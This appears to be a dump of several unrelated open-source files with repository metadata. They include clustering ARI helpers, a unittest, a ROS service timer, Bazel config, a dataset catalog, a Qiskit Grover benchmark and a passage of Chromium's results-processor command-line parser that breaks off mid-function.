def truth_from_permute_indices(data_inverse_permutation_indices, num_rows, num_cols, num_views, num_clusters):
    """Recover ground-truth view and cluster assignments from permutations.

    Args:
        data_inverse_permutation_indices: per-view list of inverse row
            permutation indices applied when the synthetic data was built.
        num_rows, num_cols, num_views, num_clusters: table dimensions;
            num_rows must be divisible by num_clusters and num_cols by
            num_views.

    Returns:
        (view_assignments, X_D_truth) where view_assignments maps each
        column to its view and X_D_truth gives each view's per-row cluster
        labels after undoing the permutation.

    Uses floor division (`//`) so the repetition counts stay integers on
    Python 3 (true division would raise a TypeError in list repetition).
    """
    num_cols_per_view = num_cols // num_views
    view_assignments = []
    for view_idx in range(num_views):
        view_assignments.extend([view_idx] * num_cols_per_view)
    num_rows_per_cluster = num_rows // num_clusters
    # Unpermuted reference labels: cluster 0 rows first, then cluster 1, ...
    reference_list = []
    for cluster_idx in range(num_clusters):
        reference_list.extend([cluster_idx] * num_rows_per_cluster)
    X_D_truth = []
    for view_idx in range(num_views):
        # Sorting by the inverse permutation restores the original row order.
        X_D_truth.append([a for (b, a) in sorted(
            zip(data_inverse_permutation_indices[view_idx], reference_list))])
    return view_assignments, X_D_truth
def ARI_CrossCat(Xc, Xrv, XRc, XRrv):
    ''' Adjusted Rand Index (ARI) calculation for a CrossCat clustered table
    To calculate ARI based on the CrossCat partition, each cell in the
    table is considered as an instance to be assigned to a cluster. A cluster
    is defined by both the view index AND the category index. In other words,
    if, and only if, two cells, regardless of which columns and rows they belong
    to, are lumped into the same view and category, the two cells are considered
    to be in the same cluster.
    For a table of size Nrow x Ncol
    Xc: (1 x Ncol) array of view assignment for each column.
        Note: It is assumed that the view indices are consecutive integers
        starting from 0. Hence, the number of views is equal to highest
        view index plus 1.
    Xrv: (Nrow x Nview) array where each row is the assignmennt of categories for the
        corresponding row in the data table. The i-th element in a row
        corresponds to the category assignment of the i-th view of that row.
    XRc and XRrv have the same format as Xr and Xrv respectively.
    The ARI index is calculated from the comparison of the table clustering
    define by (XRc, XRrv) and (Xc, Xrv).
    Returns a pair (ARI, ARI_viewonly): the cell-level ARI and the ARI of
    the column-to-view assignments alone.
    '''
    # NOTE(review): transposing suggests the inputs arrive as (Nview, Nrow)
    # despite the docstring's (Nrow, Nview) wording — confirm against callers.
    Xrv = Xrv.T
    XRrv = XRrv.T
    # Find the highest category index of all views
    max_cat_index = numpy.max(Xrv)
    # re-assign category indices so that they have different values in
    # different views (offset each view's labels by a multiple of
    # max_cat_index + 1, making (view, category) pairs globally unique)
    Xrv = Xrv + numpy.arange(0,Xrv.shape[1])*(max_cat_index+1)
    # similarly for the reference partition
    max_cat_index = numpy.max(XRrv)
    XRrv = XRrv + numpy.arange(0,XRrv.shape[1])*(max_cat_index+1)
    # Table clustering assignment for the first partition: each cell gets
    # the (globally unique) category label of its column's view.
    CellClusterAssgn = numpy.zeros((Xrv.shape[0], Xc.size))
    for icol in range(Xc.size):
        CellClusterAssgn[:,icol]=Xrv[:,Xc[icol]]
    # Flatten the table to a 1-D array compatible with the ARI function
    CellClusterAssgn = CellClusterAssgn.reshape(CellClusterAssgn.size)
    # Table clustering assignment for the second partition
    RefCellClusterAssgn = numpy.zeros((Xrv.shape[0], Xc.size))
    for icol in range(Xc.size):
        RefCellClusterAssgn[:,icol]=XRrv[:,XRc[icol]]
    # Flatten the table
    RefCellClusterAssgn = RefCellClusterAssgn.reshape(RefCellClusterAssgn.size)
    # Compare the two partitions using ARI
    ARI = calc_ari(RefCellClusterAssgn, CellClusterAssgn)
    ARI_viewonly = calc_ari(Xc, XRc)
    return ARI, ARI_viewonly
def get_column_ARI(X_L, view_assignment_truth):
    """Compute ARI between a sample's column partition and the ground truth."""
    inferred_assignments = X_L['column_partition']['assignments']
    return calc_ari(inferred_assignments, view_assignment_truth)
def get_column_ARIs(X_L_list, view_assignment_truth):
    """Compute the column-partition ARI for each sample in X_L_list.

    Returns a list of ARI values, one per X_L sample. A list comprehension
    replaces the original `map()` call, which on Python 3 yields a one-shot
    iterator instead of the list callers could index and re-iterate.
    """
    return [get_column_ARI(X_L, view_assignment_truth) for X_L in X_L_list]
def multi_chain_ARI(X_L_list, X_D_List, view_assignment_truth, X_D_truth, return_list=False):
    """Compute per-chain table and view ARIs against the ground truth.

    Returns either the per-chain arrays (when return_list is True) or their
    means as a (table, views) pair.
    """
    num_chains = len(X_L_list)
    ari_table = numpy.zeros(num_chains)
    ari_views = numpy.zeros(num_chains)
    for chain_idx in range(num_chains):
        assignments = X_L_list[chain_idx]['column_partition']['assignments']
        table_ari, views_ari = ARI_CrossCat(
            numpy.asarray(assignments),
            numpy.asarray(X_D_List[chain_idx]),
            numpy.asarray(view_assignment_truth),
            numpy.asarray(X_D_truth))
        ari_table[chain_idx] = table_ari
        ari_views[chain_idx] = views_ari
    if return_list:
        return ari_table, ari_views
    return numpy.mean(ari_table), numpy.mean(ari_views)
def create_test_set(M_c, T, X_L, X_D, n_test, seed_seed=0):
    """Draw a held-out test set of n_test rows sampled from the model.

    Queries every column of a hypothetical new row (index len(T) + 1) with
    no conditioning values, using a deterministic seed stream derived from
    seed_seed.
    """
    sample_row_idx = len(T) + 1
    n_cols = len(T[0])
    Y = []
    Q = [(sample_row_idx, col_idx) for col_idx in range(n_cols)]
    int_generator = gu.int_generator(seed_seed)
    # Use the builtin next() so this works on both Python 2.6+ and Python 3
    # (the original called the Python-2-only .next() method).
    get_next_seed = lambda: next(int_generator)
    samples = su.simple_predictive_sample(M_c, X_L, X_D, Y, Q, get_next_seed, n=n_test)
    return samples
# FIXME: remove dependence on T as input
# by making p_State constructor actually use only suffstats
def calc_mean_test_log_likelihood(M_c, T, X_L, X_D, T_test):
    """Return the mean row-predictive log likelihood of T_test under a state.

    Builds a p_State from (M_c, T, X_L, X_D) and averages the predictive
    log probability of each held-out row.
    """
    state = State.p_State(M_c, T, X_L, X_D)
    # Materialize into a list so numpy.mean receives a sequence: on
    # Python 3, numpy.mean over a lazy map object does not work.
    test_log_likelihoods = [state.calc_row_predictive_logp(row) for row in T_test]
    mean_test_log_likelihood = numpy.mean(test_log_likelihoods)
    return mean_test_log_likelihood
def calc_mean_test_log_likelihoods(M_c, T, X_L_list, X_D_list, T_test):
    """Return the mean held-out log likelihood for each (X_L, X_D) sample."""
    return [
        calc_mean_test_log_likelihood(M_c, T, X_L, X_D, T_test)
        for X_L, X_D in zip(X_L_list, X_D_list)
    ]
4debb766c3fe5106b666815ce1a1772e065de58a | 727 | py | Python | irida_staramr_results/test_unit/test_downloader.py | phac-nml/irida-staramr-results | 7574b6eead97929605bdaf226cb34062b20c1dac | [
"Apache-2.0"
] | 2 | 2021-04-19T16:07:45.000Z | 2021-07-05T15:09:04.000Z | irida_staramr_results/test_unit/test_downloader.py | phac-nml/irida-staramr-results | 7574b6eead97929605bdaf226cb34062b20c1dac | [
"Apache-2.0"
] | 16 | 2021-02-05T19:25:13.000Z | 2021-11-30T18:01:16.000Z | irida_staramr_results/test_unit/test_downloader.py | phac-nml/irida-staramr-results | 7574b6eead97929605bdaf226cb34062b20c1dac | [
"Apache-2.0"
] | 3 | 2021-03-08T14:01:15.000Z | 2021-07-20T16:39:21.000Z | import unittest
from irida_staramr_results.downloader import _get_output_file_name
class TestDownloader(unittest.TestCase):
def setUp(self):
print("\nStarting " + self.__module__ + ": " + self._testMethodName)
def tearDown(self):
pass
def test_get_output_file(self):
"""
Test output file name generation is correct.
:return:
"""
fake_prefix_name = "out"
fake_timestamp_in_millisec = 1611090794000
res_milli = _get_output_file_name(fake_prefix_name, fake_timestamp_in_millisec)
self.assertNotIn(".xlsx", res_milli)
self.assertEqual(res_milli, "out-2021-01-19T21-13-14")
if __name__ == '__main__':
    # Allow running this test module directly, outside a test runner.
    unittest.main()
| 23.451613 | 87 | 0.672627 |
b373fdbd5517742623a5158e4b39ae13ef4c20fe | 4,010 | py | Python | simulation/src/launch_tools/scripts/launch_tools/services_timer.py | LeonardII/KitCarFork | b2802c5b08cc8250446ce3731cb622af064db4ca | [
"MIT"
] | null | null | null | simulation/src/launch_tools/scripts/launch_tools/services_timer.py | LeonardII/KitCarFork | b2802c5b08cc8250446ce3731cb622af064db4ca | [
"MIT"
] | null | null | null | simulation/src/launch_tools/scripts/launch_tools/services_timer.py | LeonardII/KitCarFork | b2802c5b08cc8250446ce3731cb622af064db4ca | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""Copyright (c) 2013, Systems, Robotics and Vision Group University of the Balearican
Islands All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Systems, Robotics and Vision Group, University of
the Balearican Islands nor the names of its contributors may be used to
endorse or promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import roslib
roslib.load_manifest("launch_tools")
import sys
import threading
import rospy
import rosservice
## Class for calling a service using a timer.
#
# Waits for the service to become available, then calls it periodically
# from a rospy.Timer running in this thread.
class TimedService(threading.Thread):
    ## The constructor
    # @param self The object pointer.
    # @param name The service name this class is going to call
    # @param period The desired timer period in seconds
    def __init__(self, name, period):
        threading.Thread.__init__(self)
        self._service_name = name
        self._service_period = period
    ## Run function required by threading library
    def run(self):
        rospy.wait_for_service(self._service_name)
        rospy.Timer(rospy.Duration(self._service_period), self.callback)
        rospy.loginfo(
            "Initialized timer for service: \n\t* Name: %s\n\t* Period: %f ",
            self._service_name,
            self._service_period,
        )
    ## Timer callback: look up the service type and call it once.
    # @param event The event that has generated this callback
    def callback(self, event):
        rospy.wait_for_service(self._service_name)
        service_class = rosservice.get_service_class_by_name(self._service_name)
        try:
            service = rospy.ServiceProxy(self._service_name, service_class)
            service()
            rospy.loginfo("Service %s called.", self._service_name)
        # 'except X as e' is valid on Python 2.6+ and required on Python 3;
        # the original 'except X, e' form is a SyntaxError on Python 3.
        except rospy.ServiceException as e:
            rospy.logwarn("Service %s call failed: %s", self._service_name, e)
    ## @var _service_name
    # The service name going to be called (class-level default)
    _service_name = "service"
    ## @var _service_period
    # The timer period to call the service (class-level default)
    _service_period = 1.0
## Build the command-line usage string for this node.
def usage():
    template = "%s service period [service period ...]"
    return template % sys.argv[0]
## Script entry point: spawn one TimedService per (service, period) pair
## given on the command line, then spin until shutdown.
if __name__ == "__main__":
    rospy.init_node("services_timer")
    if len(sys.argv) < 3:
        rospy.loginfo(usage())
        sys.exit(1)
    names = sys.argv[1::2]
    periods = sys.argv[2::2]
    rospy.loginfo("names : %s", names)
    rospy.loginfo("periods : %s", periods)
    timers = [TimedService(str(n), float(p)) for n, p in zip(names, periods)]
    for timer in timers:
        timer.start()
    rospy.spin()
b997b907b13ae65512d576ca309ad7a35494a3e4 | 565 | bzl | Python | consensus/conf.bzl | francescolavra/entangled | b580441a79859455aff77fb158db31f582c24847 | [
"Apache-2.0"
] | null | null | null | consensus/conf.bzl | francescolavra/entangled | b580441a79859455aff77fb158db31f582c24847 | [
"Apache-2.0"
] | null | null | null | consensus/conf.bzl | francescolavra/entangled | b580441a79859455aff77fb158db31f582c24847 | [
"Apache-2.0"
] | null | null | null | CONSENSUS_MAINNET_VARIABLES = [
"SNAPSHOT_CONF_FILE='\"external/snapshot_conf_mainnet/file/downloaded\"'",
"SNAPSHOT_SIG_FILE='\"external/snapshot_sig_mainnet/file/downloaded\"'",
"SNAPSHOT_FILE='\"external/snapshot_mainnet/file/downloaded\"'",
"NUM_KEYS_IN_MILESTONE=20",
"MWM=14",
]
CONSENSUS_TESTNET_VARIABLES = [
"SNAPSHOT_CONF_FILE='\"external/snapshot_conf_testnet/file/downloaded\"'",
"SNAPSHOT_SIG_FILE='\"\"'",
"SNAPSHOT_FILE='\"external/snapshot_testnet/file/downloaded\"'",
"NUM_KEYS_IN_MILESTONE=22",
"MWM=9",
]
| 35.3125 | 78 | 0.723894 |
f986d49847702197173712d11338d000520ba73f | 3,867 | py | Python | lib/datasets/dataset_catalog.py | BarneyQiao/pcl.pytorch | 4e0280e5e1470f705e620eda26f881d627c5016c | [
"MIT"
] | 233 | 2019-05-10T07:17:42.000Z | 2022-03-30T09:24:16.000Z | lib/datasets/dataset_catalog.py | BarneyQiao/pcl.pytorch | 4e0280e5e1470f705e620eda26f881d627c5016c | [
"MIT"
] | 78 | 2019-05-10T21:10:47.000Z | 2022-03-29T13:57:32.000Z | lib/datasets/dataset_catalog.py | BarneyQiao/pcl.pytorch | 4e0280e5e1470f705e620eda26f881d627c5016c | [
"MIT"
] | 57 | 2019-05-10T07:17:37.000Z | 2022-03-24T04:43:24.000Z | # Copyright (c) 2017-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
"""Collection of available datasets."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
from core.config import cfg
# Path to data dir: root under which all dataset paths below are resolved.
_DATA_DIR = cfg.DATA_DIR
# Required dataset entry keys: every DATASETS entry must provide these.
IM_DIR = 'image_directory'  # directory containing the split's images
ANN_FN = 'annotation_file'  # COCO-style JSON annotation file
# Optional dataset entry keys
IM_PREFIX = 'image_prefix'      # filename prefix prepended to image names
DEVKIT_DIR = 'devkit_directory' # PASCAL VOC devkit location (VOC entries)
RAW_DIR = 'raw_dir'             # declared here but unused in this catalog
# Available datasets: maps a dataset name to its image directory and
# annotation file (plus optional prefix/devkit entries), all rooted at
# _DATA_DIR.
DATASETS = {
    # --- COCO 2014 splits ---
    'coco_2014_train': {
        IM_DIR:
            _DATA_DIR + '/coco/images/train2014',
        ANN_FN:
            _DATA_DIR + '/coco/annotations/instances_train2014.json'
    },
    'coco_2014_val': {
        IM_DIR:
            _DATA_DIR + '/coco/images/val2014',
        ANN_FN:
            _DATA_DIR + '/coco/annotations/instances_val2014.json'
    },
    'coco_2014_minival': {
        IM_DIR:
            _DATA_DIR + '/coco/images/val2014',
        ANN_FN:
            _DATA_DIR + '/coco/annotations/instances_minival2014.json'
    },
    'coco_2014_valminusminival': {
        IM_DIR:
            _DATA_DIR + '/coco/images/val2014',
        ANN_FN:
            _DATA_DIR + '/coco/annotations/instances_valminusminival2014.json'
    },
    # --- COCO 2015 test splits (image info only; no instance annotations) ---
    'coco_2015_test': {
        IM_DIR:
            _DATA_DIR + '/coco/images/test2015',
        ANN_FN:
            _DATA_DIR + '/coco/annotations/image_info_test2015.json'
    },
    'coco_2015_test-dev': {
        IM_DIR:
            _DATA_DIR + '/coco/images/test2015',
        ANN_FN:
            _DATA_DIR + '/coco/annotations/image_info_test-dev2015.json'
    },
    # --- COCO 2017 splits ---
    'coco_2017_train': {
        IM_DIR:
            _DATA_DIR + '/coco/images/train2017',
        ANN_FN:
            _DATA_DIR + '/coco/annotations/instances_train2017.json',
    },
    'coco_2017_val': {
        IM_DIR:
            _DATA_DIR + '/coco/images/val2017',
        ANN_FN:
            _DATA_DIR + '/coco/annotations/instances_val2017.json',
    },
    'coco_2017_test': {  # 2017 test uses 2015 test images
        IM_DIR:
            _DATA_DIR + '/coco/images/test2015',
        ANN_FN:
            _DATA_DIR + '/coco/annotations/image_info_test2017.json',
        IM_PREFIX:
            'COCO_test2015_'
    },
    'coco_2017_test-dev': {  # 2017 test-dev uses 2015 test images
        IM_DIR:
            _DATA_DIR + '/coco/images/test2015',
        ANN_FN:
            _DATA_DIR + '/coco/annotations/image_info_test-dev2017.json',
        IM_PREFIX:
            'COCO_test2015_'
    },
    # --- PASCAL VOC splits (COCO-format annotation JSONs) ---
    'voc_2007_trainval': {
        IM_DIR:
            _DATA_DIR + '/VOC2007/JPEGImages',
        ANN_FN:
            _DATA_DIR + '/VOC2007/annotations/voc_2007_trainval.json',
        DEVKIT_DIR:
            _DATA_DIR
    },
    'voc_2007_test': {
        IM_DIR:
            _DATA_DIR + '/VOC2007/JPEGImages',
        ANN_FN:
            _DATA_DIR + '/VOC2007/annotations/voc_2007_test.json',
        DEVKIT_DIR:
            _DATA_DIR
    },
    'voc_2012_trainval': {
        IM_DIR:
            _DATA_DIR + '/VOC2012/JPEGImages',
        ANN_FN:
            _DATA_DIR + '/VOC2012/annotations/voc_2012_trainval.json',
        DEVKIT_DIR:
            _DATA_DIR
    }
}
| 29.746154 | 78 | 0.605379 |
bf1ee9086b57e9e853ba008e72e1a67bbfca0ff8 | 4,438 | py | Python | benchmark/startQiskit_QC1048.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startQiskit_QC1048.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startQiskit_QC1048.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | # qubit number=5
# total number=51
import cirq
import qiskit
from qiskit import IBMQ
from qiskit.providers.ibmq import least_busy
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
    """Build the phase oracle Z_f for the boolean function f.

    For every n-bit assignment on which f returns "1", the corresponding
    basis state acquires a -1 phase: qubits that should read 0 are wrapped
    in X gates so a multi-controlled phase(pi) fires exactly on that state,
    then the X gates are undone.
    """
    controls = QuantumRegister(n, "ofc")
    oracle = QuantumCircuit(controls, name="Zf")
    for state_index in range(2 ** n):
        bits = np.binary_repr(state_index, n)
        if f(bits) != "1":
            continue
        zero_positions = [j for j in range(n) if bits[j] == "0"]
        for j in zero_positions:
            oracle.x(controls[j])
        # Multi-controlled U1(pi) acts as a controlled-Z on the marked state.
        if n >= 2:
            oracle.mcu1(pi, controls[1:], controls[0])
        for j in zero_positions:
            oracle.x(controls[j])
    return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
    """Build a Grover-style search circuit for the n-bit predicate f.

    Prepares a superposition, then repeats floor(sqrt(2^n) * pi / 4)
    iterations of the oracle Z_f followed by a diffusion-like block, and
    finally measures every qubit. The `# number=NN` tags are generator
    bookkeeping markers and are preserved as-is.
    """
    # circuit begin
    input_qubit = QuantumRegister(n,"qc")
    classical = ClassicalRegister(n, "qm")
    prog = QuantumCircuit(input_qubit, classical)
    # Initial layer: Hadamards plus extra generator-inserted gates.
    prog.h(input_qubit[0]) # number=3
    prog.h(input_qubit[1]) # number=4
    prog.h(input_qubit[2]) # number=5
    prog.h(input_qubit[3]) # number=6
    prog.h(input_qubit[0]) # number=38
    prog.cz(input_qubit[1],input_qubit[0]) # number=39
    prog.h(input_qubit[0]) # number=40
    prog.h(input_qubit[0]) # number=48
    prog.cz(input_qubit[1],input_qubit[0]) # number=49
    prog.h(input_qubit[0]) # number=50
    prog.z(input_qubit[1]) # number=46
    prog.cx(input_qubit[1],input_qubit[0]) # number=47
    prog.h(input_qubit[0]) # number=32
    prog.cz(input_qubit[1],input_qubit[0]) # number=33
    prog.h(input_qubit[0]) # number=34
    prog.h(input_qubit[4]) # number=21
    Zf = build_oracle(n, f)
    # Standard Grover iteration count for a single marked item.
    repeat = floor(sqrt(2 ** n) * pi / 4)
    for i in range(repeat):
        prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
        prog.h(input_qubit[0]) # number=1
        prog.h(input_qubit[1]) # number=2
        prog.h(input_qubit[2]) # number=7
        prog.h(input_qubit[3]) # number=8
        prog.cx(input_qubit[3],input_qubit[0]) # number=41
        prog.z(input_qubit[3]) # number=42
        prog.cx(input_qubit[3],input_qubit[0]) # number=43
        prog.cx(input_qubit[1],input_qubit[3]) # number=44
        prog.x(input_qubit[0]) # number=9
        prog.x(input_qubit[1]) # number=10
        prog.x(input_qubit[2]) # number=11
        prog.cx(input_qubit[0],input_qubit[3]) # number=35
        prog.x(input_qubit[3]) # number=36
        prog.cx(input_qubit[0],input_qubit[3]) # number=37
        if n>=2:
            prog.mcu1(pi,input_qubit[1:],input_qubit[0])
        prog.cx(input_qubit[1],input_qubit[0]) # number=24
        prog.x(input_qubit[0]) # number=25
        prog.cx(input_qubit[1],input_qubit[0]) # number=26
        prog.x(input_qubit[1]) # number=14
        prog.x(input_qubit[2]) # number=15
        prog.x(input_qubit[3]) # number=16
        prog.h(input_qubit[0]) # number=17
        prog.h(input_qubit[1]) # number=18
        prog.h(input_qubit[2]) # number=19
        prog.h(input_qubit[3]) # number=20
        prog.x(input_qubit[1]) # number=22
        prog.x(input_qubit[1]) # number=23
    # circuit end
    for i in range(n):
        prog.measure(input_qubit[i], classical[i])
    return prog
if __name__ == '__main__':
    # Oracle: marks exactly the all-zeros 5-bit string.
    key = "00000"
    f = lambda rep: str(int(rep == key))
    prog = make_circuit(5,f)
    # Run on the least busy real IBMQ backend with enough qubits.
    IBMQ.load_account()
    provider = IBMQ.get_provider(hub='ibm-q')
    provider.backends()
    backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 2 and not x.configuration().simulator and x.status().operational == True))
    sample_shot =7924
    info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
    # Transpile against a fake backend just to report depth/diagram.
    backend = FakeVigo()
    circuit1 = transpile(prog,backend,optimization_level=2)
    # Dump measurement counts and circuit stats to a CSV for later analysis.
    writefile = open("../data/startQiskit_QC1048.csv","w")
    print(info,file=writefile)
    print("results end", file=writefile)
    print(circuit1.depth(),file=writefile)
    print(circuit1,file=writefile)
    writefile.close()
51c3ef48c338f4fd5eaaa54d7c42c14c05ef93ee | 7,950 | py | Python | tools/perf/core/results_processor/command_line.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 76 | 2020-09-02T03:05:41.000Z | 2022-03-30T04:40:55.000Z | tools/perf/core/results_processor/command_line.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 45 | 2020-09-02T03:21:37.000Z | 2022-03-31T22:19:45.000Z | tools/perf/core/results_processor/command_line.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 8 | 2020-07-22T18:49:18.000Z | 2022-02-08T10:27:16.000Z | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Implements the interface of the results_processor module.
Provides functions to parse command line arguments and process options.
"""
import argparse
import datetime
import logging
import os
import re
import sys
from py_utils import cloud_storage
from core.results_processor import formatters
from core.results_processor import util
def ArgumentParser(standalone=False):
    """Create an ArgumentParser defining options required by the processor.

    Args:
        standalone: when True, build a standalone parser (with its own help
            and required output arguments); when False, build a parser meant
            to be composed into Telemetry's, with 'none' as an extra output
            format and html as the implied default.

    Returns:
        The configured argparse.ArgumentParser.
    """
    all_output_formats = list(formatters.FORMATTERS.keys())
    if not standalone:
        all_output_formats.append('none')
    parser, group = _CreateTopLevelParser(standalone)
    parser.add_argument(
        '-v', '--verbose', action='count', dest='verbosity', default=0,
        help='Increase verbosity level (repeat as needed)')
    group.add_argument(
        '--output-format', action='append', dest='output_formats',
        metavar='FORMAT', choices=all_output_formats, required=standalone,
        help=Sentences(
            'Output format to produce.',
            'May be used multiple times to produce multiple outputs.',
            # Fixed user-facing typo: was 'Avaliable'.
            'Available formats: %(choices)s.',
            '' if standalone else 'Defaults to: html.'))
    group.add_argument(
        '--intermediate-dir', metavar='DIR_PATH', required=standalone,
        help=Sentences(
            'Path to a directory where intermediate results are stored.',
            '' if standalone else 'If not provided, the default is to create a '
            'new directory within "{output_dir}/artifacts/".'))
    group.add_argument(
        '--output-dir', default=_DefaultOutputDir(), metavar='DIR_PATH',
        help=Sentences(
            'Path to a directory where to write final results.',
            'Default: %(default)s.'))
    group.add_argument(
        '--max-values-per-test-case', type=int, metavar='NUM',
        help=Sentences(
            # A comma was missing here, so the two literals concatenated
            # into "...values.This includes..." in --help output.
            'Fail a test run if it produces more than this number of values.',
            'This includes both ad hoc and metric generated measurements.'))
    group.add_argument(
        '--reset-results', action='store_true',
        help=Sentences(
            'Overwrite any previous output files in the output directory.',
            'The default is to append to existing results.'))
    group.add_argument(
        '--results-label', metavar='LABEL',
        help='Label to identify the results generated by this run.')
    group.add_argument(
        '--test-path-format', metavar='FORMAT',
        choices=[util.TELEMETRY_TEST_PATH_FORMAT, util.GTEST_TEST_PATH_FORMAT],
        default=util.TELEMETRY_TEST_PATH_FORMAT,
        help=Sentences(
            'How to interpret the testPath attribute.',
            'Available options: %(choices)s. Default: %(default)s.'))
    group.add_argument(
        '--trace-processor-path',
        help=Sentences('Path to trace processor shell.',
                       'Default: download a pre-built version from the cloud.'))
    group.add_argument(
        '--upload-results', action='store_true',
        help='Upload generated artifacts to cloud storage.')
    group.add_argument(
        '--upload-bucket', default='output', metavar='BUCKET',
        help=Sentences(
            'Storage bucket to use for uploading artifacts.',
            'Supported values are: %s; or a valid cloud storage bucket name.'
            % ', '.join(sorted(cloud_storage.BUCKET_ALIASES)),
            'Defaults to: %(default)s.'))
    group.add_argument(
        '--experimental-tbmv3-metrics', action='store_true',
        help='Enable running experimental TBMv3 metrics.')
    group.add_argument(
        '--fetch-power-profile',
        action='store_true',
        help=('Specify this if you want to run proxy power metrics that use '
              'device power profiles.'))
    group.add_argument(
        '--extra-metric', action='append', dest='extra_metrics', metavar='METRIC',
        help=('Compute an extra metric on the test results. Metric should have '
              'the form "version:name", e.g. "tbmv3:power_rails_metric". '
              'Can be used multiple times.'))
    group.add_argument(
        '--is-unittest',
        action='store_true',
        help='Is running inside a unittest.')
    group.add_argument(
        '--fetch-device-data',
        action='store_true',
        help='Android-specific argument to enable fetching data from a device.')
    group.add_argument(
        '--device-data-path',
        dest='device_data_path',
        help=('Android-specific argument for --fetch-data-device. Use this to '
              'specify the path on device to pull data from using adb.'))
    group.add_argument(
        '--local-data-path',
        dest='local_data_path',
        default=os.environ.get('ISOLATED_OUTDIR'),
        help=('Android-specific argument for --fetch-data-device. Use this to '
              'override the local copy path. Defaults to ISOLATED_OUTDIR '
              'environment variable.'))
    return parser
def ProcessOptions(options):
    """Adjust result processing options as needed before running benchmarks.

    Mutates `options` in place: configures the root logger from the
    verbosity count, resolves output/intermediate directories, derives an
    intermediate directory when none was given, normalizes the upload
    bucket, and normalizes the list of output formats (defaulting to html
    and dropping 'none').

    Only attributes defined by the ArgumentParser above are read or
    modified. If the selected command produced no output_dir (e.g.
    "run_benchmark list"), this function returns early.

    Args:
        options: An options object with values parsed from the command line.
    """
    # Map the -v count onto a logging level.
    if options.verbosity >= 2:
        level = logging.DEBUG
    elif options.verbosity == 1:
        level = logging.INFO
    else:
        level = logging.WARNING
    logging.getLogger().setLevel(level)

    # No output generation requested; nothing further to normalize.
    if getattr(options, 'output_dir', None) is None:
        return

    def _resolve(path):
        return os.path.realpath(os.path.expanduser(path))

    options.output_dir = _resolve(options.output_dir)

    if options.intermediate_dir:
        options.intermediate_dir = _resolve(options.intermediate_dir)
    else:
        # Derive a fresh, label- and time-stamped directory under artifacts/.
        label = options.results_label
        filesafe_label = re.sub(r'\W+', '_', label) if label else 'run'
        start_time = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')
        options.intermediate_dir = os.path.join(
            options.output_dir, 'artifacts',
            '%s_%s' % (filesafe_label, start_time))

    if options.upload_results:
        options.upload_bucket = cloud_storage.BUCKET_ALIASES.get(
            options.upload_bucket, options.upload_bucket)
    else:
        options.upload_bucket = None

    if not options.output_formats:
        options.output_formats = ['html']
    else:
        formats = sorted(set(options.output_formats))
        if 'none' in formats:
            formats.remove('none')
        options.output_formats = formats
def _CreateTopLevelParser(standalone):
"""Create top level parser, and group for result options."""
if standalone:
parser = argparse.ArgumentParser(
description='Standalone command line interface to results_processor.')
# In standalone mode, both the parser and group are the same thing.
return parser, parser
else:
parser = argparse.ArgumentParser(add_help=False)
group = parser.add_argument_group(title='Result processor options')
return parser, group
def _DefaultOutputDir():
"""Default output directory.
Points to the directory of the benchmark runner script, if found, or the
current working directory otherwise.
"""
